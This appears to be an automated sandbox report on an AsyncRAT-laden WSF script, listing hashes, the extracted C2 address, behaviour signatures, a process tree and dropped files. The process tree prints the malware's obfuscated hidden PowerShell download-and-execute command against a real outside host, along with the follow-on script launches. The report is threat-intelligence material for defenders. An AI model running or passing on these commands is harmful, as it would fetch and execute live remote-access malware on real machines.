Overview

overview

10

Static

static

1

JxQdThApPv.WSF.wsf

windows7-x64

8

JxQdThApPv.WSF.wsf

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2025, 11:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    JxQdThApPv.WSF.wsf

  • Size

    465KB

  • MD5

    5cd92159ae3ab267e6b71d0a38b1a135

  • SHA1

    3bca9b4d7c2405b75019737ebb5f28719b4d307a

  • SHA256

    0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1

  • SHA512

    2cfa54c21444c1b03336bdb49f92bd420c856a824ec0f85bb31b187f13e422d106a4ef72c2d2ee794c7dc34e540afd8c82914a5f9ba2f9754adb92476bbf1d02

  • SSDEEP

    12288:WYlYlYlYlYlYlYlYlYlYlYlYRYlYlYlYlYlYlYlYlYlYlYlY0YlYlYlYlYlYlYle:h

Score
10/10
asyncrat00000001discoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

C2

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JxQdThApPv.WSF.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$gGENXWVRcDoy='IeX(NeW-OBJeCT NeT.W';$ZPDsGQJSHtFC='eBCLIeNT).DOWNLO';$LnNvzWQSAEwo='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($gGENXWVRcDoy+$ZPDsGQJSHtFC+$LnNvzWQSAEwo);
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Public\Music\N6Mn2cyKv4.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\System32\net.exe
      "C:\Windows\System32\net.exe" session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1436
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4256
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\N6Mn2cyKv4.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\N6Mn2cyKv4.ps1'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4628
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2312
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Music\N6Mn2cyKv4.vbs"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\System32\net.exe
        "C:\Windows\System32\net.exe" session
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          3⤵
            PID:4256
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\N6Mn2cyKv4.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4860
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\N6Mn2cyKv4.ps1'"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:228
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              4⤵
                PID:3612
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5100

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          b29d1cb3e9761a90902c4a66a2ba3d5a

          SHA1

          63c64b29626976bc0a143d72f291bb50727dffbe

          SHA256

          b998ed3cf206c4dac06d6028943a2f5accd73a93aca74420afe7480c464bf124

          SHA512

          54bac9ee28a46f57bfac8fecb6d8af504cb483b70f62f06febd9768d4254b611a082c8191d93599ebfd4a5b75a85dd387b758db1439df89337473c8f68a3cd88

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oo22uoy2.p0m.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Public\Music\N6Mn2cyKv4.bat
          Filesize

          2KB

          MD5

          414a0ec26fcf829d77ce6200892225b1

          SHA1

          1c92825a9384931a4a349e70f019d1d0a5559469

          SHA256

          83e69d1f610e2974a2031bee57511c276953d4f250f26927b01e3b6b1129f745

          SHA512

          7112bbb4376b524dce357db1a3a34e9b207f69f51d5eeffc7c1100990b2fcb951924e6c18207fad681b40fa9d394abe5aa170d491867b407be9ec5723c094896

          Download Submit

        • C:\Users\Public\Music\N6Mn2cyKv4.ps1
          Filesize

          453KB

          MD5

          06355fdb659b0835a5cdf2096ae3c136

          SHA1

          b64651a5e7f492032511e5439c9f3e5cd3a91e2e

          SHA256

          9342a3d4d31647a0eaa30943fa97d24f08a3502e0a0a67b8b9ffba31ad4a77b9

          SHA512

          9681dd315694733473ae9f2c07d19fd0617eccdd857c1038987db9e5c11bbf72e4e77874701dc1da5d318e19b1f29642c37a49e295ac3863b4f0e1d31e7b9111

          Download Submit

        • C:\Users\Public\Music\N6Mn2cyKv4.vbs
          Filesize

          4KB

          MD5

          ab8a4a6f0da1106552be4c4cfa5c1491

          SHA1

          9cb89e68c93ed6ea58d5d585cf14d9a9ed560fb9

          SHA256

          7446773ad16120c2e8917f5bc98b5cc108525a7fe42e1f29398a673147a097cd

          SHA512

          a18e118bb4156a5636e860e348a30b70d1390628b828a4b39d2ff13f3f25f0e18d9e9b02edd6fc79f5865ca1b293ffc7222b8e84ef02d58e8cbdf1247381e62c

          Download Submit

        • memory/1020-37-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-46-0x00000209A84C0000-0x00000209A8682000-memory.dmp

          Filesize

          1.8MB

          Download

        • memory/1020-13-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-52-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-2-0x00000209A7DD0000-0x00000209A7DF2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1020-36-0x00007FF81EA33000-0x00007FF81EA35000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1020-1-0x00007FF81EA33000-0x00007FF81EA35000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1020-12-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-48-0x00000209A8BC0000-0x00000209A90E8000-memory.dmp

          Filesize

          5.2MB

          Download

        • memory/1020-47-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-19-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1020-45-0x00007FF81EA30000-0x00007FF81F4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2312-44-0x0000000006CF0000-0x0000000006D56000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2312-43-0x0000000006C50000-0x0000000006CEC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2312-40-0x0000000005BF0000-0x0000000005BFA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2312-39-0x0000000005C00000-0x0000000005C92000-memory.dmp

          Filesize

          584KB

          Download

        • memory/2312-38-0x0000000005FC0000-0x0000000006564000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2312-33-0x0000000000400000-0x0000000000416000-memory.dmp

          Filesize

          88KB

          Download

        • memory/4628-32-0x00000208F6C30000-0x00000208F6C3C000-memory.dmp

          Filesize

          48KB

          Download